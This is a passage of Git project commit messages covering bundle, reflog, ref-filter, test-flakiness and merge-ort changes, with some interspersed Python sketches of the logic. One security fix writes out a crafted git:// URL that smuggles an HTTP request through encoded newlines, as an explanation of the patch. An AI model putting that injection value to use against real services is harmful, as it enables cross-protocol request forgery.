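With two left-hand commits sharing a patch-id that also appears on
the right, both are suppressed, which is the case the bug got wrong.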
We'll keep the hashmap details out of the caller by providing a simple
iteration interface. We can retain the simple has_commit_patch_id()
interface for the other callers, but we'll simplify its return value
into an integer, rather than returning the patch_id struct. That way
they won't be tempted to look at the "commit" field of the return value
without iterating.
Reported-by: Arnaud Morin <arnaud.morin@gmail.com>
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When running 'git clone --local', the operation may fail if another
process is modifying the source repository. Document that this race
condition is known to hopefully help anyone who may run into it.
Suggested-by: Junio C Hamano <gitster@pobox.com>
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In order to create an incremental bundle, we need to pass many arguments
to let git-bundle ignore some already packed commits. It will be more
convenient to pass args via stdin. But the current implementation does
not allow us to do this.
This is because args are parsed twice when creating bundle. The first
time for parsing args is in `compute_and_write_prerequisites()` by
running `git-rev-list` command to write prerequisites in bundle file,
and stdin is consumed in this step if "--stdin" option is provided for
`git-bundle`. Later nothing can be read from stdin when running
`setup_revisions()` in `create_bundle()`.
The solution is to parse args once by removing the entire function
`compute_and_write_prerequisites()` and then calling function
`setup_revisions()`. In order to write prerequisites for the bundle, we will
call `prepare_revision_walk()` and `traverse_commit_list()`. But after
calling `prepare_revision_walk()`, the object array `revs.pending` is
left empty, and the following steps could not work properly with the
empty object array (`revs.pending`). Therefore, make a copy of `revs`
to `revs_copy` for later use right after calling `setup_revisions()`.
The copy `revs_copy` is not a deep copy; it shares the same objects
with `revs`. The object array of `revs` has been cleared, but the objects
themselves are still kept. Flags of objects may change after calling
`prepare_revision_walk()`, and we can use these changed flags without
calling the `git rev-list` command and parsing its output like the
former implementation.
Also add testcases for git bundle in t6020, which read args from stdin.
Signed-off-by: Jiang Xin <zhiyou.jx@alibaba-inc.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
`git rev-list` will list one commit for the following command:
$ git rev-list 'main^!'
<tip-commit-of-main-branch>
But providing the same rev-list args to `git bundle` fails to create
a bundle file.
$ git bundle create - 'main^!'
# v2 git bundle
-<OID> <one-line-message>
fatal: Refusing to create empty bundle.
This is because when removing duplicate objects in function
`object_array_remove_duplicates()`, one unique pending object which has
the same name is deleted by mistake. The revision arg 'main^!' in the
above example is parsed by `handle_revision_arg()`, and at least two
different objects will be appended to `revs.pending`, one points to the
parent commit of the "main" branch, and the other points to the tip
commit of the "main" branch. These two objects have the same name
"main". Only one object is left with the name "main" after calling the
function `object_array_remove_duplicates()`.
And what's worse, when adding boundary commits to the pending list, we use
one-line commit messages as names, and these arbitrary names may surprise
git-bundle.
Only comparing objects themselves (".item") is also not good enough,
because a user may want to create a bundle with two identical objects but
with different reference names, such as: "HEAD" and "refs/heads/main".
Add a new function `contains_object()` which compares both the address and
the name of the object.
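The comparison can be sketched in Python as below. The data layout is
an assumption: each pending entry is modelled as an (item, name)
tuple, and object identity ("is") stands in for comparing addresses.

```python
def contains_object(array, item, name):
    """True if the array already holds this exact object under this name."""
    return any(
        entry_item is item and entry_name == name
        for entry_item, entry_name in array
    )


def remove_duplicates(array):
    """Drop an entry only if both the object and the name repeat."""
    unique = []
    for item, name in array:
        if not contains_object(unique, item, name):
            unique.append((item, name))
    return unique
```

Two different objects that share the name "main" both survive, and so
does one object listed under two names such as "HEAD" and
"refs/heads/main"; only an exact repeat is removed.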
Signed-off-by: Jiang Xin <zhiyou.jx@alibaba-inc.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Move git-bundle related functions from t5510 to a library, and this lib
will be shared with a new testcase t6020 which finds a known breakage of
"git-bundle".
Signed-off-by: Jiang Xin <zhiyou.jx@alibaba-inc.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This sequence works
$ git checkout -b newbranch
$ git commit --allow-empty -m one
$ git show -s newbranch@{1}
and shows the state that was immediately after the newbranch was
created.
But then if you do
$ git reflog expire --expire=now refs/heads/newbranch
$ git commit --allow-empty -m two
$ git show -s newbranch@{1}
you'd be scolded with
fatal: log for 'newbranch' only has 1 entries
While it is true that it has only 1 entry, we have enough
information in that single entry that records the transition between
the state in which the tip of the branch was pointing at commit
'one' to the new commit 'two' built on it, so we should be able to
answer "what object newbranch was pointing at?". But we refuse to
do so.
Make @{0} the special case where we use the new side to look up that
entry. Otherwise, look up @{n} using the old side of the (n-1)th entry
of the reflog.
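The lookup rule can be written down as a short Python sketch. The
representation is an assumption: the reflog is a list of
(old, new) pairs with the newest entry first, and the function name
is made up for illustration.

```python
def read_ref_at(reflog, n):
    """Resolve ref@{n} from a reflog given as (old, new) pairs, newest first."""
    if n == 0:
        if not reflog:
            raise LookupError("reflog is empty")
        return reflog[0][1]  # new side of the most recent entry
    if n - 1 >= len(reflog):
        raise LookupError(f"log only has {len(reflog)} entries")
    return reflog[n - 1][0]  # old side of the (n-1)th entry
```

With the single surviving entry ("one", "two") from the example
above, @{0} resolves to "two" and @{1} now resolves to "one" instead
of failing.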
Suggested-by: Junio C Hamano <gitster@pobox.com>
Signed-off-by: Denton Liu <liu.denton@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Mostly remove the comment I added in 5e9637c629 (i18n: add
infrastructure for translating Git with gettext, 2011-11-18). Since
then we had a fix in 9c0495d23e (gettext.c: detect the vsnprintf bug
at runtime, 2013-12-01) so we're not running with the "set back to C
locale" hack on any modern system.
So having more than 1/4 of the file taken up by a digression about a
glibc bug that mostly doesn't happen to anyone anymore is just a
needless distraction. Shorten the comment to make a brief mention of
the bug, and where to find more info by looking at the git history for
this now-removed comment.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Remove a migratory warning I added in 6cdccfce1e (i18n: make
GETTEXT_POISON a runtime option, 2018-11-08) to give anyone using that
option in their builds a heads-up about the change from compile-time
to runtime introduced in that commit.
It's been more than 2 years since then; anyone who ran into this is
likely to have made a change as a result, so removing this is long
overdue.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The table describing the porcelain format in git-status(1) is helpful,
but it's not completely clear what the three sections mean, even to
some contributors. As a result, users are unable to find how to detect
common cases like merge conflicts programmatically.
Let's improve this situation by rephrasing to be more explicit about
what each of the sections in the table means, to tell users in plain
language which cases are occurring, and to describe what "unmerged"
means.
Signed-off-by: brian m. carlson <sandals@crustytoothpaste.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This block of code is duplicated twice. In a future commit, it will be
duplicated for a third time. Factor out the common functionality into
set_read_ref_cutoffs().
In the case of read_ref_at_ent(), we are incrementing `cb->reccnt` at the
beginning of the function. Move these to right before the return so that
the `cb->reccnt - 1` is changed to `cb->reccnt` and it can be cleanly
factored out into set_read_ref_cutoffs(). The duplication of the
increment statements will be removed in a future patch.
Signed-off-by: Denton Liu <liu.denton@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
"directory cache" (or "directory cache index", "cache") are obsolete
terms which have been superseded by "index". Keeping them in the
documentation may be a source of confusion. This commit replaces
them with the current term, "index", on man pages.
Signed-off-by: Utku Gultopu <ugultopu@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Commit 014ade7484 (upload-pack: send ERR packet for non-tip objects,
2019-04-13) added a test that greps the output of a failed fetch to make
sure that upload-pack sent us the ERR packet we expected. But checking
this is racy; despite the argument in that commit, the client may still
be sending a "done" line after the server exits, causing it to die() on
a failed write() and never see the ERR packet at all.
This fails quite rarely on Linux, but more often on macOS. However, it
can be triggered reliably with:
diff --git a/fetch-pack.c b/fetch-pack.c
index 876f90c759..cf40de9092 100644
--- a/fetch-pack.c
+++ b/fetch-pack.c
@@ -489,6 +489,7 @@ static int find_common(struct fetch_negotiator *negotiator,
done:
trace2_region_leave("fetch-pack", "negotiation_v0_v1", the_repository);
if (!got_ready || !no_done) {
+ sleep(1);
packet_buf_write(&req_buf, "done\n");
send_request(args, fd[1], &req_buf);
}
This is a real user-visible race that it would be nice to fix, but it's
tricky to do so: the client would have to speculatively try to read an
ERR packet after hitting a write() error. And at least for this error,
it's specific to v0 (since v2 does not enforce reachability at all).
So let's loosen the test to avoid annoying racy failures. If we
eventually do the read-after-failed-write thing, we can tighten it. And
if not, v0 will grow increasingly obsolete as servers support v2, so the
utility of this test will decrease over time anyway.
Note that we can still check stderr to make sure upload-pack bailed for
the reason we expected. It writes a similar message to stderr, and
because the server side is just another process connected by pipes,
we'll reliably see it. This would not be the case for git://, or for
ssh servers that do not relay stderr (e.g., GitHub's custom endpoint
does not).
Helped-by: SZEDER Gábor <szeder.dev@gmail.com>
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When running this test in Cygwin, it's necessary to remove the inherited
access control lists from the Git working directory in order for later
permissions tests to work as expected.
As such, fix an error in the test script so that the ACLs are set for
the working directory, not a nonexistent subdirectory.
Signed-off-by: Adam Dinwoodie <adam@dinwoodie.org>
Reviewed-by: Matheus Tavares <matheus.bernardino@usp.br>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In a bunch of test cases in 't7800-difftool.sh' we 'grep' for specific
filenames in 'git difftool's output, and those test cases are prone to
occasional failures because those filenames might be part of the name
of difftool's temporary directory as well, e.g.:
+git difftool --dir-diff --no-symlinks --extcmd ls v1
+grep sub output
+test_line_count = 2 sub-output
test_line_count: line count for sub-output != 2
/tmp/git-difftool.Ssubfq/left/:
sub
/tmp/git-difftool.Ssubfq/right/:
sub
error: last command exited with $?=1
not ok 50 - difftool --dir-diff v1 from subdirectory --no-symlinks
Fix this by tightening the 'grep' patterns looking for those
interesting filenames to match only lines where a filename stands on
its own.
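The effect of anchoring the pattern can be reproduced with Python's
re module on the output quoted above. The anchored pattern "^sub$" is
an assumption about what a tightened pattern looks like, used here
only to illustrate the idea.

```python
import re

# The listing from the failing run above: the temporary directory
# name happens to contain "sub".
output = """/tmp/git-difftool.Ssubfq/left/:
sub
/tmp/git-difftool.Ssubfq/right/:
sub
""".splitlines()

# Unanchored: also matches the directory header lines.
loose = [line for line in output if re.search(r"sub", line)]

# Anchored: matches only lines where the filename stands on its own.
tight = [line for line in output if re.search(r"^sub$", line)]
```

Here the unanchored pattern matches four lines and the anchored one
matches the expected two.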
Signed-off-by: SZEDER Gábor <szeder.dev@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Google may have changed Gmail security and now less secure app access
needs to be explicitly enabled if two-factor authentication is not in
place, otherwise send-email fails with:
5.7.8 Username and Password not accepted. Learn more at
5.7.8 https://support.google.com/mail/?p=BadCredentials
Document steps required to make this work.
Signed-off-by: Vasyl Vavrychuk <vvavrychuk@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
[dl: Clean up commit message and incorporate suggestions into patch.]
Signed-off-by: Denton Liu <liu.denton@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
'git for-each-repo --config=X' should return success without calling any
subcommands when the config key 'X' has no value. The current
implementation instead segfaults.
A user could run into this issue if they used 'git maintenance start' to
initialize their cron schedule using 'git for-each-repo
--config=maintenance.repo ...' but then used 'git maintenance
unregister' to remove the config option. (Note: 'git maintenance stop'
would remove the config _and_ remove the cron schedule.)
Add a simple test to ensure this works. Use 'git help --no-such-option'
as the potential subcommand to ensure that we will hit a failure if the
subcommand is ever run.
Reported-by: Andreas Bühmann <dev@uuml.de>
Helped-by: Eric Sunshine <sunshine@sunshineco.com>
Helped-by: Junio C Hamano <gitster@pobox.com>
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The text says "if you can certify DCO then you add a Signed-off-by
trailer". But it does not say anything about people who cannot or
do not want to certify. A natural reading may be that if you do not
certify, you must not add the trailer, but it shouldn't hurt to be
overly explicit.
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Change the output of the likes of "git branch -l --sort=-objectsize"
to show the "(HEAD detached at <hash>)" message at the start of the
output. Before the compare_detached_head() function added in a
preceding commit we'd emit this output as an emergent effect.
It doesn't make any sense to consider the objectsize, type or other
non-attribute of the "(HEAD detached at <hash>)" message for the
purposes of sorting. Let's always emit it at the top instead. The only
reason it was sorted in the first place is because we're injecting it
into the ref-filter machinery so builtin/branch.c doesn't need to do
its own "am I detached?" detection.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Change the ref-filter sorting of detached HEAD to check the
FILTER_REFS_DETACHED_HEAD flag, instead of relying on the ref
description filled-in by get_head_description() to start with "(",
which in turn we expect to ASCII-sort before any other reference.
For context, we'd like the detached line to appear first at the start
of "git branch -l", e.g.:
$ git branch -l
* (HEAD detached at <hash>)
master
This doesn't change that, but improves on a fix made in
28438e84e0 (ref-filter: sort detached HEAD lines firstly, 2019-06-18)
and gives the Chinese translation the ability to use its preferred
punctuation marks again.
In Chinese the fullwidth versions of punctuation like "()" are
typically written as (U+FF08 fullwidth left parenthesis), (U+FF09
fullwidth right parenthesis) instead[1]. This form is used in both
po/zh_{CN,TW}.po in most cases where "()" is translated in a string.
Aside from that improvement to the Chinese translation, it also just
makes for cleaner code that we mark any special cases in the ref_array
we're sorting with flags and make the sort function aware of them,
instead of piggy-backing on the general-case of strcmp() doing the
right thing.
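A minimal Python sketch of flag-based sorting is given below. The
flag value, the dict layout and the comparison function are
assumptions for illustration and do not mirror ref-filter.c; only the
normal (non-reverse) sort order is modelled.

```python
from functools import cmp_to_key

FILTER_REFS_DETACHED_HEAD = 1 << 0  # illustrative value, not Git's


def compare_refs(a, b):
    """Sort the detached HEAD entry first, everything else by name."""
    a_detached = bool(a["kind"] & FILTER_REFS_DETACHED_HEAD)
    b_detached = bool(b["kind"] & FILTER_REFS_DETACHED_HEAD)
    if a_detached != b_detached:
        return -1 if a_detached else 1
    # General case: plain string comparison of the names.
    return (a["name"] > b["name"]) - (a["name"] < b["name"])


refs = [
    {"name": "master", "kind": 0},
    # A description starting with a fullwidth parenthesis (U+FF08),
    # which does not sort before ASCII letters.
    {"name": "\uff08HEAD detached at abc1234\uff09",
     "kind": FILTER_REFS_DETACHED_HEAD},
]
by_flag = sorted(refs, key=cmp_to_key(compare_refs))
by_name = sorted(refs, key=lambda ref: ref["name"])
```

Sorting by name alone puts "master" first once the description no
longer starts with an ASCII "(", while the flag-aware comparison
keeps the detached HEAD line at the top.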
As seen in the amended tests this made reverse sorting a bit more
consistent. Before this we'd sometimes sort this message in the
middle, now it's consistently at the beginning or end, depending on
whether we're doing a normal or reverse sort. Having it at the end
doesn't make much sense either, but at least it behaves consistently
now. A follow-up commit will make this behavior under reverse sorting
even better.
I'm removing the "TRANSLATORS" comments that were in the old code
while I'm at it. Those were added in d4919bb288 (ref-filter: move
get_head_description() from branch.c, 2017-01-10). I think it's
obvious from context, string and translation memory in typical
translation tools that these are the same or similar strings.
1. https://en.wikipedia.org/wiki/Chinese_punctuation#Marks_similar_to_European_punctuation
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Change the reverse/ignore_case/version sort flags in the ref_sorting
struct into a bitfield. Having three of them was already a bit
unwieldy, but it would be even more so if another flag needed a
function like ref_sorting_icase_all() introduced in
76f9e569ad (ref-filter: apply --ignore-case to all sorting keys,
2020-05-03).
A follow-up change will introduce such a flag, so let's move this over
to a bitfield. Instead of using the usual '#define' pattern I'm using
the "enum" pattern from builtin/rebase.c's b4c8eb024a (builtin
rebase: support --quiet, 2018-09-04).
Perhaps there's a more idiomatic way of doing the "for each in list
amend mask" pattern than this "mask/on" variable combo. This function
doesn't allow us to e.g. do any arbitrary changes to the bitfield for
multiple flags, but I think in this case that's fine. The common case
is that we're calling this with a list of one.
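The "mask/on" pattern can be sketched in Python with enum.IntFlag.
The flag names, their values and the helper name are illustrative
assumptions, and the list of dicts merely stands in for the linked
list of sort keys.

```python
from enum import IntFlag


class RefSortingFlags(IntFlag):
    REVERSE = 1 << 0
    ICASE = 1 << 1
    VERSION = 1 << 2


def set_sort_flag_all(sorting, mask, on):
    """Set or clear one flag (the mask) on every sort key in the list."""
    for key in sorting:
        if on:
            key["flags"] |= mask
        else:
            key["flags"] &= ~mask
```

Adding a fourth flag then only needs a new enum member, rather than
another struct field plus another "apply to all keys" helper.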
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Further amend code changed in 7c5045fc18 (ref-filter: apply fallback
refname sort only after all user sorts, 2020-05-03) to move an
assignment only used in the "else if" arm to happen there. Before that
commit the cmp_fn would be used outside of it.
We could also just skip the "cmp_fn" assignment and use
strcasecmp/strcmp directly in a ternary statement here, but this is
probably more readable.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Per the CodingGuidelines add braces to an if/else if/else chain where
only the "else" had braces. This is in preparation for a subsequent
change where the "else if" will have lines added to it.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The previous commit taught the clone/fetch client side to reject a
git:// URL with a newline in it. Let's also catch these when fscking a
.gitmodules file, which will give an earlier warning.
Note that it would be simpler to just complain about newline in _any_
URL, but an earlier tightening for http/ftp made sure we kept allowing
newlines for unknown protocols (and this is covered in the tests). So
we'll stick to that precedent.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When we connect to a git:// server, we send an initial request that
looks something like:
002dgit-upload-pack repo.git\0host=example.com
If the repo path contains a newline, then it's included literally, and
we get:
002egit-upload-pack repo
.git\0host=example.com
This works fine if you really do have a newline in your repository name;
the server side uses the pktline framing to parse the string, not
newlines. However, there are many _other_ protocols in the wild that do
parse on newlines, such as HTTP. So a carefully constructed git:// URL
can actually turn into a valid HTTP request. For example:
git://localhost:1234/%0d%0a%0d%0aGET%20/%20HTTP/1.1 %0d%0aHost:localhost%0d%0a%0d%0a
becomes:
0050git-upload-pack /
GET / HTTP/1.1
Host:localhost
host=localhost:1234
on the wire. Again, this isn't a problem for a real Git server, but it
does mean that feeding a malicious URL to Git (e.g., through a
submodule) can cause it to make unexpected cross-protocol requests.
Since repository names with newlines are presumably quite rare (and
indeed, we already disallow them in git-over-http), let's just disallow
them over this protocol.
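The framing above can be reproduced with a short Python sketch. It assumes
the simplified request layout used in the examples of this message
(command, path, NUL, "host=" and the host), and all helper names are
hypothetical. The URL splitter is deliberately naive and is not how Git
parses URLs.

```python
from urllib.parse import unquote_to_bytes


def pkt_line(payload: bytes) -> bytes:
    """Frame a payload: 4 hex digits giving the total length, then the data."""
    return b"%04x" % (len(payload) + 4) + payload


def initial_request(host: bytes, path: bytes) -> bytes:
    # Same simplified layout as the examples in the message above.
    return pkt_line(b"git-upload-pack " + path + b"\0host=" + host)


def split_git_url(url: str):
    """Naive splitter for git://host[:port]/path (illustration only)."""
    hostport, _, tail = url[len("git://"):].partition("/")
    # Percent-escapes such as %0d%0a are decoded into raw CR and LF bytes.
    return hostport.encode(), unquote_to_bytes("/" + tail)


def has_newline(host: bytes, path: bytes) -> bool:
    """The kind of check described here: a newline byte in host or path."""
    return b"\n" in host or b"\n" in path


url = ("git://localhost:1234/%0d%0a%0d%0aGET%20/%20HTTP/1.1 "
       "%0d%0aHost:localhost%0d%0a%0d%0a")
host, path = split_git_url(url)
request = initial_request(host, path)
```

Because the receiver of a pkt-line trusts the length prefix, the embedded
CR/LF bytes pass through untouched, which is why the check has to happen on
the client before the request is built.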
Hostnames could likewise inject a newline, but this is unlikely to be a
problem in practice; we'd try resolving the hostname with a newline in
it, which wouldn't work. Still, it doesn't hurt to err on the side of
caution there, since we would not expect them to work in the first
place.
The ssh and local code paths are unaffected by this patch. In both cases
we're trying to run upload-pack via a shell, and will quote the newline
so that it makes it intact. An attacker can point an ssh url at an
arbitrary port, of course, but unless there's an actual ssh server
there, we'd never get as far as sending our shell command anyway. We
_could_ similarly restrict newlines in those protocols out of caution,
but there seems little benefit to doing so.
The new test here is run alongside the git-daemon tests, which cover the
same protocol, but it shouldn't actually contact the daemon at all. In
theory we could make the test more robust by setting up an actual
repository with a newline in it (so that our clone would succeed if our
new check didn't kick in). But a repo directory with newline in it is
likely not portable across all filesystems. Likewise, we could check
git-daemon's log that it was not contacted at all, but we do not
currently record the log (and anyway, it would make the test racy with
the daemon's log write). We'll just check the client-side stderr to make
sure we hit the expected code path.
Reported-by: Harold Kim <h.kim@flatt.tech>
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
A 3-year-old test that was not testing anything useful has been
corrected.
* fc/t6030-bisect-reset-removes-auxiliary-files:
test: bisect-porcelain: fix location of files
"git worktree repair" learned to deal with the case where both the
repository and the worktree moved.
* es/worktree-repair-both-moved:
worktree: teach `repair` to fix multi-directional breakage
The ORT merge strategy learned to synthesize a virtual ancestor tree
by recursively merging multiple merge bases together, just like the
recursive backend has done for years.
* en/merge-ort-recursive:
merge-ort: implement merge_incore_recursive()
merge-ort: make clear_internal_opts() aware of partial clearing
merge-ort: copy a few small helper functions from merge-recursive.c
commit: move reverse_commit_list() from merge-recursive
When a user does not tell "git pull" to use rebase or merge, the
command gives a loud message telling a user to choose between
rebase or merge but creates a merge anyway, forcing users who would
want to rebase to redo the operation. Fix an early part of this
problem by tightening the condition to give the message---there is
no reason to stop or force the user to choose between rebase or
merge if the history fast-forwards.
* fc/pull-merge-rebase:
pull: display default warning only when non-ff
pull: correct condition to trigger non-ff advice
pull: get rid of unnecessary global variable
pull: give the advice for choosing rebase/merge much later
pull: refactor fast-forward check
More "ORT" merge strategy.
* en/merge-ort-2:
merge-ort: add modify/delete handling and delayed output processing
merge-ort: add die-not-implemented stub handle_content_merge() function
merge-ort: add function grouping comments
merge-ort: add a paths_to_free field to merge_options_internal
merge-ort: add a path_conflict field to merge_options_internal
merge-ort: add a clear_internal_opts helper
merge-ort: add a few includes
The merge backend "done right" starts to emerge.
* en/merge-ort-impl:
merge-ort: free data structures in merge_finalize()
merge-ort: add implementation of record_conflicted_index_entries()
tree: enable cmp_cache_name_compare() to be used elsewhere
merge-ort: add implementation of checkout()
merge-ort: basic outline for merge_switch_to_result()
merge-ort: step 3 of tree writing -- handling subdirectories as we go
merge-ort: step 2 of tree writing -- function to create tree object
merge-ort: step 1 of tree writing -- record basenames, modes, and oids
merge-ort: have process_entries operate in a defined order
merge-ort: add a preliminary simple process_entries() implementation
merge-ort: avoid recursing into identical trees
merge-ort: record stage and auxiliary info for every path
merge-ort: compute a few more useful fields for collect_merge_info
merge-ort: avoid repeating fill_tree_descriptor() on the same tree
merge-ort: implement a very basic collect_merge_info()
merge-ort: add an err() function similar to one from merge-recursive
merge-ort: use histogram diff
merge-ort: port merge_start() from merge-recursive
merge-ort: add some high-level algorithm structure
merge-ort: setup basic internal data structures
Various improvements to the codepath that writes out pack bitmaps.
* tb/pack-bitmap: (24 commits)
pack-bitmap-write: better reuse bitmaps
pack-bitmap-write: relax unique revwalk condition
pack-bitmap-write: use existing bitmaps
pack-bitmap: factor out 'add_commit_to_bitmap()'
pack-bitmap: factor out 'bitmap_for_commit()'
pack-bitmap-write: ignore BITMAP_FLAG_REUSE
pack-bitmap-write: build fewer intermediate bitmaps
pack-bitmap.c: check reads more aggressively when loading
pack-bitmap-write: rename children to reverse_edges
t5310: add branch-based checks
commit: implement commit_list_contains()
bitmap: implement bitmap_is_subset()
pack-bitmap-write: fill bitmap with commit history
pack-bitmap-write: pass ownership of intermediate bitmaps
pack-bitmap-write: reimplement bitmap writing
ewah: add bitmap_dup() function
ewah: implement bitmap_or()
ewah: make bitmap growth less aggressive
ewah: factor out bitmap growth
rev-list: die when --test-bitmap detects a mismatch
...
The "--format=%(trailers)" mechanism gets enhanced to make it
easier to design output for machine consumption.
* ab/trailers-extra-format:
pretty format %(trailers): add a "key_value_separator"
pretty format %(trailers): add a "keyonly"
pretty-format %(trailers): fix broken standalone "valueonly"
pretty format %(trailers) doc: avoid repetition
pretty format %(trailers) test: split a long line
When the `--super-prefix` option was implemented in 74866d7579 (git: make
super-prefix option, 2016-10-07), its existence was only documented in
the manpage but not in the command's own usage string. Given that the
commit message didn't mention that this was done intentionally and given
that it's documented in the manpage, this seems like an oversight.
Add it to the usage string to fix the inconsistency.
Signed-off-by: Patrick Steinhardt <ps@pks.im>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Commit 83bbf9b92e (mergetool--lib: improve support for vimdiff-style tool
variants, 2020-07-29) introduced a regression in the output of `git mergetool
--tool-help` and `git difftool --tool-help` [1].
In function 'show_tool_names' in git-mergetool--lib.sh, we loop over the
supported mergetools and their variants and accumulate them in the variable
'variants', separating them with a literal '\n'.
The code then uses 'echo $variants' to turn these '\n' into newlines, but this
behaviour is not portable; it just happens to work in some shells, like
dash(1)'s 'echo' builtin.
For shells in which 'echo' does not turn '\n' into newlines, the end
result is that the only tools that are shown are the existing variants
(except the last variant alphabetically), since the variants are
separated by actual newlines in '$variants' because of the several
'echo' calls in mergetools/{bc,vimdiff}::list_tool_variants.
Fix this bug by embedding an actual line feed into `variants` in
show_tool_names(). While at it, replace `sort | uniq` by `sort -u`.
To prevent future regressions, add a simple test that checks that a few
known tools are correctly shown (let's avoid counting the total number
of tools to lessen the maintenance burden when new tools are added or if
'--tool-help' learns additional logic, like hiding tools depending on
the current platform).
[1] https://lore.kernel.org/git/CADtb9DyozjgAsdFYL8fFBEWmq7iz4=prZYVUdH9W-J5CKVS4OA@mail.gmail.com/
Reported-by: Philippe Blain <levraiphilippeblain@gmail.com>
Based-on-patch-by: Johannes Sixt <j6t@kdbg.org>
Signed-off-by: Philippe Blain <levraiphilippeblain@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The last test of t4129 creates a directory and expects its setgid bit
(g+s) to be off. But this makes the test fail when the parent directory
has the bit set, as setgid's state is inherited by newly created
subdirectories.
One way to solve this problem is to allow the presence of this bit when
comparing the return of `test_modebits` with the expected value. But
then we may have the same problem in the future when other tests start
using `test_modebits` on directories (currently t4129 is the only one)
and forget about setgid. Instead, let's make the helper function more
robust with respect to the state of the setgid bit in the test directory
by removing this bit from the returning value. There should be no
problem with existing callers as no one currently expects this bit to be
on.
Note that the sticky bit (+t) and the setuid bit (u+s) are not
inherited, so we don't have to worry about those.
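The idea of dropping setgid from the reported mode can be sketched
numerically in Python. This is only an illustration with a hypothetical
helper name; the real `test_modebits` helper is a shell function and may
work on a textual mode string rather than on numeric bits.

```python
import stat


def mode_bits_without_setgid(st_mode: int) -> int:
    """Return the permission bits of st_mode with the setgid bit cleared."""
    # S_IMODE keeps permission, setuid, setgid and sticky bits only;
    # masking with ~S_ISGID then removes just the setgid bit.
    return stat.S_IMODE(st_mode) & ~stat.S_ISGID
```

A directory created under a setgid parent (for example mode 02775) and one
created under a plain parent (0775) then compare equal, while the sticky and
setuid bits are left alone.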
Reported-by: Kevin Daudt <me@ikke.info>
Signed-off-by: Matheus Tavares <matheus.bernardino@usp.br>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Further stress the --sort callback in ref-filter.c. The implementation
uses certain short-circuiting logic; let's make sure it behaves the
same way on e.g. name & version sort. Improves a test added in
aedcb7dc75 (branch.c: use 'ref-filter' APIs, 2015-09-23).
I don't think all of this output makes sense, but let's test for the
behavior as-is; we can fix bugs in it in a later commit.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
There has never been a "git branch --local", this is just a typo for
"--list". Fixes a comment added in 23e714df91 (branch: roll
show_detached HEAD into regular ref_list, 2015-09-23).
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
According to the guidelines in parse-options.h,
we should not end in a full stop or start with
a capital letter. Fix old error and usage
messages to match this expectation.
Signed-off-by: ZheNing Hu <adlternative@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
"Keep it homogeneous across the repository" is in general a
guideline that can be used to converge to a good practice, but
we can be a bit more prescriptive in this case. Just like the
messages we give die(_("...")) are formatted without the final
full stop and without the initial capitalization, most of the
argument help text is already formatted that way, and we want
to encourage that as the house style.
Noticed-by: ZheNing Hu <adlternative@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Signed-off-by: ZheNing Hu <adlternative@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Now that mktag has been migrated to use the fsck machinery to check
its input, it makes sense to teach it to run in the equivalent of "git
fsck"'s default mode.
For cases where mktag is used to (re)create a tag object using data
from an existing and malformed tag object, the validation may
optionally have to be loosened. Teach the command to take the
"--[no-]strict" option to do so.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Similar to the previous commits, try to avoid peeking into the `struct
lock_file`. We also have some `struct tempfile`s -- let's avoid looking
into those as well.
Note that `do_write_index()` takes a tempfile and that when we call it,
we either have a tempfile which we can easily hand down, or we have a
lock file, from which we need to somehow obtain the internal tempfile.
So we need to leave that one instance of peeking-into. Nevertheless,
this commit leaves us not relying on exactly how the path of the
tempfile / lock file is stored internally.
Signed-off-by: Martin Ågren <martin.agren@gmail.com>
Reviewed-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Similar to the previous commits, avoid peeking into the `struct
lock_file`. Use the lock file API instead. Note how we obtain the path
